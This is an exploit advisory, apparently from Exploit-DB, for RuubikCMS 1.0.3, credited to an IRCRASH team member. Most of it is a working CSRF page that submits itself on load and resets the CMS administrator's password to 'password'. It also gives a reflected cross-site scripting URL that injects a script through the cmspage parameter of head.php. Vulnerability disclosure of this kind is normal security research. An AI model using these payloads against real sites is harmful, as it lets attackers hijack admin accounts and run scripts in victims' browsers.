RuubikCMS Version 1.0.3 Multiple Vulnerabilities

Published: 2011-03-08 CVE: N/A OSVDB-ID: N/A
  1. ----------------------------------------------------------------
  2. WebApplication : RuubikCMS Version 1.0.3
  3. Type of vunlnerability : CSRF ( Change Admin Password ) And XSS
  4. Risk of use : Medium
  5. ----------------------------------------------------------------
  6. Producer Website : http://www.ruubikcms.com/
  7. ----------------------------------------------------------------
  8. Discovered by : Khashayar Fereidani
  9. Team Website : Http://IRCRASH.COM
  10. Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
  11. English Forums : Http://IRCRASH.COM/forums/
  12. Email : irancrash [ a t ] gmail [ d o t ] com
  13. ----------------------------------------------------------------
  14.  
  15. CSRF For Change Admin Password :
  16.  
  17. <body onLoad=javascript:document.form.submit()>
  18.  
  19. <form action="http://examplesite/ruubikcms/cms/users.php?role=5&p=admin";
  20.  
  21. method="POST" name="form">
  22.  
  23. <input type="hidden" name="save" value="1">
  24.  
  25. <input type="hidden" name="ordernum" value="1">
  26.  
  27. <input type="hidden" name="username_hidden" value="admin">
  28.  
  29. <input type="hidden" name="password" value="password">
  30.  
  31. <input type="hidden" name="confirmpassword" value="password">
  32.  
  33.  
  34.  
  35. </form>
  36. </body>
  37. </html>
  38.  
  39. ------------------------------------------------
  40.  
  41. Cross Site Scripting Vulnerability :
  42.  
  43. http://examplesite/ruubikcms/cms/includes/head.php?cmspage=</title><script>alert(123);</script>
  44.  

Other Refrences

EXPLOIT-DB Advistory : http://www.exploit-db.com/exploits/16946/